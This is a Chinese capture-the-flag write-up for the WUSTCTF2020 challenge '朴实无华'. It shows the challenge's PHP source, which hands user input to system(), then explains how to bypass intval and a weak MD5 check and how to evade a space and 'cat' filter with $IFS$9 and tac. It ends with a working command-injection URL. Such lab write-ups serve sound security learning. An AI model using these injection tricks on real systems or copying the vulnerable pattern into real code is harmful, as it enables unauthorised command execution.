[WUSTCTF2020]朴实无华

审题

就一个hack me 我去 手动目录爆破得到robots.txt 看到tips 进去假flag 抓包也没东西 看wp(太菜没办法呜呜呜)
what wp说响应头里面有东西 我咋啥都看不到 嗯? 可能是题目复现的问题 不管了 假装我发现了fl4g.php

解题

P.S.妈的题目一堆中文乱码 虽然不影响做题 但是很难受

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>

第一层 intval这个函数如果传入一个科学计数法数字 比如传入2e5 那么intval返回的就只是2 但是

1
2
3
4
5
6
<?php
$num='2e5';
echo("intval('2e5') = ".intval($num));
echo('<br>');
echo("intval('2e5'+1) = ".intval($num+1));
?>

发现可以绕过了(小本本记下来)
传入’2e5’ 嘶 怎么绕不过去 去掉引号倒是可以 奇了怪了 可能是后台自动将传入的当作字符处理吧

第二层 md5弱类型 如果0e开头 对于md5来说是一个值 而且0e开头的md5加密之后也还是0e开头 成功绕过

第三层 题目过滤了空格和cat cat可以用tac绕 空格的话 可以用linux特殊函数绕过 如$IFS$9 先get_flag=ls 读到目录 然后tac就行了
payload:

1
http://d640d9d2-8b37-4784-9766-6d339a161ac7.node3.buuoj.cn/fl4g.php?num=2e4&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

EOF